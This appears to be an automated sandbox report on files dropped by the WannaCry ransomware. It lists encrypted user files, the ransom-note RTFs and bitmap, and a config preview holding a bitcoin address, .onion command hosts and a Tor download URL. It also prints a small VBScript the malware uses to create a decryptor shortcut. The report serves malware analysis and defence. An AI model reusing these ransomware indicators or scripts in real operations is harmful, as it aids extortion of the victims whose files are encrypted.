                                                  MD5:A4EEA8E89E29E8AD13C5223A81BAF812
                                                  SHA1:37C0FF660F100E916DC45A7E582EB3D59B7C40BA
                                                  SHA-256:F1A848B1F6594FD1A7D4EE0F8856970773EA7B2C9B22A2B719F3EB1BE41D5159
                                                  SHA-512:E4AA8948F8F968B2A259F23DEE9E21EF4A064EB0B9AABD962109D76DE01E406B5865A3EF4EFB1171CFC465E9A37B3093CE0889AD6740504017EC7227088D23E8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........T.:..-.hL..+f.....l...=.s9.5.......*..3C..?........;.Y..p.Xah.}M...4.e.z...j..B\cz.u+i...=.....G4e....z(...C...:./.....:dNC[....#.=kB.-..(.J`.N..]..E%.,.vD.>K.=`.rQ1...{B...N...d..0.u.....aT.#..C.^.}...0B8..b.s.6......o..,.|+..F.D.#...,...............;.I..I....n..Rau.8.d.u...!K.P..z..-.0=3.:.._..U%8>S..S0%.sp..a.b..,DF...2.....d......#......w7n...Q..s.+qr... +.(...`.r+._...1..9....x..]..5m!l...J=..p....s.p+.YY.,LkjWe....P....\x.."..*.f.=a..2........DH....u.e....K%.P.Ep."%....pj.V.....w1.kN....g....[...a....6..H..p...u.F^2S....,D.6......v..r).l-\!..C.....;XW3!.^{..h....],.>...bd..Q.J..h......I&.xR..8.V=....t.uA..y......|s.$.W=..e2.....<h1..TP[.6..&Q..`N...K..msg..H.@.N.{..+.N]5.V.6..p7~.{[.l.u.S.e..4.g>.....Lc!.(.._2<.-..9.:n..;X.?l............*;..h.WX.^...w....3yJ/....!..^...sQs..(.....l..jp*R..`x.m[E.m.$...yg^... ....g;..LW.8}.k5$..............m.y.t..p....q71B..f.).q....bu2'at!...#.N..O.+........(z.....\..._.(..!.,^*........

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\SQSJKEBWDT.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.796226678192958
                                                  Encrypted:false
                                                  SSDEEP:24:m3CckNTjzTkdc/S31A85mTTxeH8Cfa1dYN9Xqts6k3:m3Cc6HygHrQuE
                                                  MD5:EEB3F078DE2489A8B344014DBF30C577
                                                  SHA1:DE1950E86CD2F10EA52B7D633C58FD7F8EA90DD1
                                                  SHA-256:486B971F8B11006829AECA94D9879322497923968E5BB6FDB521DA241F4DC6A5
                                                  SHA-512:BFDD02F33A2649E57229074152E1C44903D0859E6DC99898FCB325902E2892F82595D67F106C42B22F11CB8EF92E51350574A9D4FBCA978E5A2C402BD0A7DC18
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:4... Y+.._..^..*...D.^:\..n.I.R..1B..r?....]IE.an...z......7..X....|.dT.sR:.....:...+....B:.e.z..&}..4...W.Xd/q...S.`..ZI..#...[....S._OX.X..-ZI..v......c..s..@./......n.z.))gN/.)O...@..!'o.IV....S.}..w.V..#.....p..Uw[.]{....VV..f.a7.X..OY.....|...G...$......t+.S....um+..[..EY..u...s..*.s.*..S..+.jy.}3b.w.6./%..TJ..}...{.s..n..e..!...[1.j.9... ...a!v.._k..}.Q...nU'd.l.I_m..H.w......tU.......;\/3..e...}t.V`~.h..g..*.?K....]9)....u..8]v.g.X.B_v.Aj&E.?.~a..so@T.{......~.v4...-Y.%....Y...*^.e.....W.9...%..3.sc./...!.w..o#.9-G.p3.3..l.CK:.>]O..X.-.......W...e..A.w.d?L...\>...C$+c..;.....r_...*;@.....+..`....6.4.\MM.1........(.3.......r.t.[.......'....~f3.:.x..:.WD...N7.fvv ...c;..=.u......Ls.....{................u.P.q9....$."i=p`.7.p...p.F.5AV..O...p.?....6`.h4...(-.).....("......*@$......1.T.............R.Q.}..a.{..-....I.....6...."*..Y.7..{L....0.$.._...V.Fd....e..S..r..b!d...u...b..@.]t.....Z./.;..kT..VU$.;.tY.\A...[#.!..}.H..r;.&PN2..c.Nh

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\SQSJKEBWDT.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852923872437741
                                                  Encrypted:false
                                                  SSDEEP:24:bkJXSQfBurbKovlb+xzMHzwYYGqUJRUa3cN6YSEW9PVIFeQ7vmqtbahhkl0Aicnb:bkJiQAfvN+2TyasNHeNWEQzshhkCKJjh
                                                  MD5:3FF10E66E129EEF9B8FA9045B92133FE
                                                  SHA1:563A7AD11A20805F7B5A29271F354028B2AF50B9
                                                  SHA-256:4DAF0F0B843CB2694842CA4DE484F8782C69509257D6E26A8E84B6246463ABEB
                                                  SHA-512:FAFE911A5A77ADAD220D36D3B8B8C07D8685BE0A413E55ED86AB2B77753E16EA97B785E1C58ADF24519FF5AAC7E780C9682AD35966B6968E1F5FA8AC85F826ED
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....J..H..!(...(..ab.yo......,....f.&~.:........g..20......).|;.b\..UM..7.E.g.G.?.p......n..qV..Y...|P..6R....X...o.q...O,C.D....6..>g.w.........1..S.M_.Y...H#..t....^...q..h..Rja..w.i..@a4....p...j.S.~...p.........{x..../...._c.Q."...B`op.$..@..0.S.(............\;...@....Gy.X...e..N...k5O........YJkS......b... ....k..Q2.....9....U.......@l2..LM..gH...H..U..(....|9..#Ug...RC..Gt.T^...t..|Q.KK}..>... [N.L....m.....X`u.E..S..+..R2....}....j.+....1#.gzo...c...Q.....S...{.>.x.r..n..M......k=J....-B........{..V..d.((...I.@.&...g.-E4hCA9.........r.....B.r...6?..j.S.^`y.=.B..Q.S.......Yhd~...$.%..........>|.....z.aq..Q..E....B)......B..5`.......vHx...$4...D.wO.A...\;]....n.Dj<iLz5C...kmG$b.....n.....j.n...D.P.M..EM..z}.. .H.e.YC......%.,[.Y8+qS.#../y\.oL.|r....0B.H+.$.......M....tW......H8...E..k.c.<...#.....%.aa.....j...5.p......#...Q.)......K.p.Xn....)..q............~6..........F8[...G|#.t..t#".BSJC..]...!V.....#.zqY....k.5...B../1..

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\SQSJKEBWDT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852923872437741
                                                  Encrypted:false
                                                  SSDEEP:24:bkJXSQfBurbKovlb+xzMHzwYYGqUJRUa3cN6YSEW9PVIFeQ7vmqtbahhkl0Aicnb:bkJiQAfvN+2TyasNHeNWEQzshhkCKJjh
                                                  MD5:3FF10E66E129EEF9B8FA9045B92133FE
                                                  SHA1:563A7AD11A20805F7B5A29271F354028B2AF50B9
                                                  SHA-256:4DAF0F0B843CB2694842CA4DE484F8782C69509257D6E26A8E84B6246463ABEB
                                                  SHA-512:FAFE911A5A77ADAD220D36D3B8B8C07D8685BE0A413E55ED86AB2B77753E16EA97B785E1C58ADF24519FF5AAC7E780C9682AD35966B6968E1F5FA8AC85F826ED
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....J..H..!(...(..ab.yo......,....f.&~.:........g..20......).|;.b\..UM..7.E.g.G.?.p......n..qV..Y...|P..6R....X...o.q...O,C.D....6..>g.w.........1..S.M_.Y...H#..t....^...q..h..Rja..w.i..@a4....p...j.S.~...p.........{x..../...._c.Q."...B`op.$..@..0.S.(............\;...@....Gy.X...e..N...k5O........YJkS......b... ....k..Q2.....9....U.......@l2..LM..gH...H..U..(....|9..#Ug...RC..Gt.T^...t..|Q.KK}..>... [N.L....m.....X`u.E..S..+..R2....}....j.+....1#.gzo...c...Q.....S...{.>.x.r..n..M......k=J....-B........{..V..d.((...I.@.&...g.-E4hCA9.........r.....B.r...6?..j.S.^`y.=.B..Q.S.......Yhd~...$.%..........>|.....z.aq..Q..E....B)......B..5`.......vHx...$4...D.wO.A...\;]....n.Dj<iLz5C...kmG$b.....n.....j.n...D.P.M..EM..z}.. .H.e.YC......%.,[.Y8+qS.#../y\.oL.|r....0B.H+.$.......M....tW......H8...E..k.c.<...#.....%.aa.....j...5.p......#...Q.)......K.p.Xn....)..q............~6..........F8[...G|#.t..t#".BSJC..]...!V.....#.zqY....k.5...B../1..

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\ZQIXMVQGAH.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.8028171231414705
                                                  Encrypted:false
                                                  SSDEEP:24:1YGWf8Mo45cZVXIcYi5U0NoDXLqDgVuKYCXearo2tnS2tCGX1Wu:1Y70MsZtYi10q2uKrBrDpZXP
                                                  MD5:E2D5E69252CF336CD099FBAFECEF877C
                                                  SHA1:E83E79CFF15FD565E173E14E637A7BCD8B998510
                                                  SHA-256:C30EDDF1F70BB44D1AA47134A855A54A26EC7949D83167CB45F3335ED3387D06
                                                  SHA-512:3F03493DEAA889348132F6B9B5103818A45AD253B3E97764CABCF43FCF99052CEE72F19D6D09D4A992A31A4480D0B1861DCC8908E74ED8C8F96574383B2DC661
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:8z.~..!...p~..x."e.GO.|<...bZ..X.2p.f..J...y.k.JD.!...e......H^.'`........h^.E.a..dY..?.7.R........!{..<...@.e..2..d..wG0.W7....c..\C......)..k=..}...8=c.Z_.1....2.....!.~.)Z;....b.#..f.....kew.vRSDWy(.WX..:v.N.m..C....f1SZ.0..#PK3...U....<...G#.......~...M.......(.I...^..+.U...C...B9.M.....j..i..o...'..3...N..n.7.>b..@sx\..~..G..Y....."&'...Q..1....]4...Ls.......h.u[...,.y`...o....WEs...x.@...6.U...B.^s.8.p.r+......Z.;4......,..B.E......D<Gt.......-9!yONW.h-.r"..g.>....x2`..kF..`/\9..h...?...W(!^...[.{..+Oq..W..W}V-|.u../...6..9wh.J]0...K...-.9......,.ov.)6+..g........p.n.P?...y.6.9y..i.%9.0_....".5...*...U..:E..aQ...9......2....8...).$0.k!Tg....!\.e@...E.L.......p.....B..V.:.........Q....R;Nl'....4..o.#.f%..9.7.H..C..(.J.... w..|b.....P..]H.}..../.O.....X._J...F.7.x...\^|.&.A1@..;U..........u......2....B.Y..CvS..-..k.>..............5b......[1..Y.^......../..iK.I-n.c.`q.|....(o....\1<..qD..a.W..3'.}8'E..l.....j.'.BR.....

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\ZQIXMVQGAH.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826459817095266
                                                  Encrypted:false
                                                  SSDEEP:24:bkN5xH74BfWAYafw9yQTnYsFIYoPfEqCkjJIocvZWHGH0qM+O6:bkN5UiVnYvPrqoaZTS6
                                                  MD5:5B381BA418A30AEB8E6281BD66D45417
                                                  SHA1:5E202ACF6693C16F6700C064AC4AA7ACEB7F4CD5
                                                  SHA-256:54821FFE76F1A0865A5FFD03AAFD7C597461C5882E0E2DEB191E0BEA934DC1D9
                                                  SHA-512:7E1ABE53753574AE78E88A0CDDE515A4179C66D79179242361DE4BD72F8ECC74F2B3E6B0F5918D84C4E416DF612C1A1C19F891CBB9214E05EC8FC0DEF458D002
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......hF.../..6..?..q.>=....}.._.:.....A.......7..n.....#.?...[.YbW-.&Z....#......3c%.>.......CPn..C.......p..._...o_. M...'....{..q.......p....*3.. .c.6..=Xh.5...."..4).d.v.M8.R+.h..,.q,....h.....)...m":.w;..d3.U.Md.ti..t[..=.....R..Z.|/...&.n .V.*............."j..~..P.6.yk...L....v'#.Rj;c..M.%/...j$..L."...j.<70)...Oe.....e.d.^Y..`......FGH.!..P...<. b+...m..c.SR....;....'.....gF~.....8n&.q.,..w..s..%!F_...\.?~..;.c....6k[........MP...CV.4.....U..S....h ....md#oX..!...o....yH .....l..D,<..7`..4.H.bV.z;.....CF..y..i.G.H/.2=qM..G-..F...V..r&j.."...P...zM..\..]&.d.u..M._..PE.[......37....+..!._.T...A...AP....CQ..F.......ay.)v_........;.$.Q..!.!#..p<..rJd..v.rj..OG..mu....5.'..4...e..O.2&9.O...5..+g.oqn..Y.B..h....J3.....|?t......M|F.w..*..l./0.;...d.....Ha..H-...#.Y(. ........e......B..[....l..A..b...}...^.IPd%.{?L...M.a...!.A..........k@gA9...L./@.s..P..W........./D.....Z.&....$@G}..p.{.........'......d|%-..n.A<...H......U.o...x4>l.

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\ZQIXMVQGAH.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826459817095266
                                                  Encrypted:false
                                                  SSDEEP:24:bkN5xH74BfWAYafw9yQTnYsFIYoPfEqCkjJIocvZWHGH0qM+O6:bkN5UiVnYvPrqoaZTS6
                                                  MD5:5B381BA418A30AEB8E6281BD66D45417
                                                  SHA1:5E202ACF6693C16F6700C064AC4AA7ACEB7F4CD5
                                                  SHA-256:54821FFE76F1A0865A5FFD03AAFD7C597461C5882E0E2DEB191E0BEA934DC1D9
                                                  SHA-512:7E1ABE53753574AE78E88A0CDDE515A4179C66D79179242361DE4BD72F8ECC74F2B3E6B0F5918D84C4E416DF612C1A1C19F891CBB9214E05EC8FC0DEF458D002
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......hF.../..6..?..q.>=....}.._.:.....A.......7..n.....#.?...[.YbW-.&Z....#......3c%.>.......CPn..C.......p..._...o_. M...'....{..q.......p....*3.. .c.6..=Xh.5...."..4).d.v.M8.R+.h..,.q,....h.....)...m":.w;..d3.U.Md.ti..t[..=.....R..Z.|/...&.n .V.*............."j..~..P.6.yk...L....v'#.Rj;c..M.%/...j$..L."...j.<70)...Oe.....e.d.^Y..`......FGH.!..P...<. b+...m..c.SR....;....'.....gF~.....8n&.q.,..w..s..%!F_...\.?~..;.c....6k[........MP...CV.4.....U..S....h ....md#oX..!...o....yH .....l..D,<..7`..4.H.bV.z;.....CF..y..i.G.H/.2=qM..G-..F...V..r&j.."...P...zM..\..]&.d.u..M._..PE.[......37....+..!._.T...A...AP....CQ..F.......ay.)v_........;.$.Q..!.!#..p<..rJd..v.rj..OG..mu....5.'..4...e..O.2&9.O...5..+g.oqn..Y.B..h....J3.....|?t......M|F.w..*..l./0.;...d.....Ha..H-...#.Y(. ........e......B..[....l..A..b...}...^.IPd%.{?L...M.a...!.A..........k@gA9...L./@.s..P..W........./D.....Z.&....$@G}..p.{.........'......d|%-..n.A<...H......U.o...x4>l.

                                                  C:\Users\user\Desktop\b.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):1440054
                                                  Entropy (8bit):0.3363393123555661
                                                  Encrypted:false
                                                  SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                  MD5:C17170262312F3BE7027BC2CA825BF0C
                                                  SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                  SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                  SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\c.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):780
                                                  Entropy (8bit):2.378875357594115
                                                  Encrypted:false
                                                  SSDEEP:6:ch++pZkaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:chrmaRVcKKfm2MYS3sUQqGLGeTEV
                                                  MD5:13FDC0BDFCC558AF0CB67F2CCEDF50ED
                                                  SHA1:84F527EF3842AB66CF17F292F21C205DE9331FC6
                                                  SHA-256:2756852E8CC70FA194332BCE038915DC0AAA2717EC98A32815480E63C9FAB602
                                                  SHA-512:2B5D524B5ED68640ABE5AF8025C1EB4E97748BBAA072461C26214CA3F1202DE589ED4857DE7CD6C021A429BC3B03CD6E3AB9A1CB432B788FF08143DCD4023654
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..............................................................................................................ad...........C......................................................115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\f.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):918
                                                  Entropy (8bit):4.682670189489066
                                                  Encrypted:false
                                                  SSDEEP:24:oS+VwuVwuVwuVwuVwuVwuVwuVwuVwhbmVwuVwuVwuVwuVwuVwuVwuVwuVwhJdkaT:oNwawawawawawawawawh+wawawawawaM
                                                  MD5:6180A0DAA217257F733A9FF7447D5C1C
                                                  SHA1:3C08383F42935C77612C20FC7DA52DDB28DFA3EE
                                                  SHA-256:B6871C1B1E6A5E1F410D1EC791BC0A7332F0522AA1F1EB0BB5A839E5746A35F6
                                                  SHA-512:D815F45133BE67E0B70098BCA49FF9435FCC94276CFD471525E0D678FFB0F3310C8AB89A4EF1FEAF940772E4810F62A109D90DFDF4E2E5DE0369B17089EEA0EA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:C:\Users\user\Desktop\PWCCAWLGRE.mp3.WNCRY..C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\EventStore.db.WNCRY..C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user-32.png.WNCRY..C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_16.png.WNCRY..C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\pkcs11.txt.WNCRY..

                                                  C:\Users\user\Desktop\m.vbs

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):199
                                                  Entropy (8bit):4.993433402537439
                                                  Encrypted:false
                                                  SSDEEP:3:gponhvDCKFcsDONy+WlynJ96JS2x9rbPONy+WlynJSK2Fvn:e+hvbnRoJgJSoPnRoJSK2Fv
                                                  MD5:BC117AC292350CB5C49A0D1660AFF679
                                                  SHA1:FB6A629B267BBF4E7E4BC63B299F92DC1E518D4D
                                                  SHA-256:E7325F2A555AE1A1694951B7782C4159013597C2D5BF480CC091C6A0E66BFC64
                                                  SHA-512:B66227CF3944AF105818176FA43F628F89E4393B372949BC86A7513E11B62209B96B169C33E836E32C8BBA4387B78844A9FB08F37F62EC1E05DEF2F2BF89B093
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..

                                                  C:\Users\user\Desktop\msg\m_bulgarian.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):47879
                                                  Entropy (8bit):4.950611667526586
                                                  Encrypted:false
                                                  SSDEEP:768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
                                                  MD5:95673B0F968C0F55B32204361940D184
                                                  SHA1:81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
                                                  SHA-256:40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
                                                  SHA-512:7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_chinese (simplified).wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):54359
                                                  Entropy (8bit):5.015093444540877
                                                  Encrypted:false
                                                  SSDEEP:768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
                                                  MD5:0252D45CA21C8E43C9742285C48E91AD
                                                  SHA1:5C14551D2736EEF3A1C1970CC492206E531703C1
                                                  SHA-256:845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
                                                  SHA-512:1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}@\'b9\'d9\'c5\'c1;}..{\f45\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}@MingLiU;}{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}..{\f54\fbidi \fmodern\fchar

                                                  C:\Users\user\Desktop\msg\m_chinese (traditional).wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):79346
                                                  Entropy (8bit):4.901891087442577
                                                  Encrypted:false
                                                  SSDEEP:768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
                                                  MD5:2EFC3690D67CD073A9406A25005F7CEA
                                                  SHA1:52C07F98870EABACE6EC370B7EB562751E8067E9
                                                  SHA-256:5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
                                                  SHA-512:0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020

                                                  C:\Users\user\Desktop\msg\m_croatian.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):39070
                                                  Entropy (8bit):5.03796878472628
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdb2YG2+d18Scgn8c8/868H1F8E8/8Z3m8VdAm86a8n:Shef3jHd3G2n+p/mZrS14A
                                                  MD5:17194003FA70CE477326CE2F6DEEB270
                                                  SHA1:E325988F68D327743926EA317ABB9882F347FA73
                                                  SHA-256:3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
                                                  SHA-512:DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_czech.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):40512
                                                  Entropy (8bit):5.035949134693175
                                                  Encrypted:false
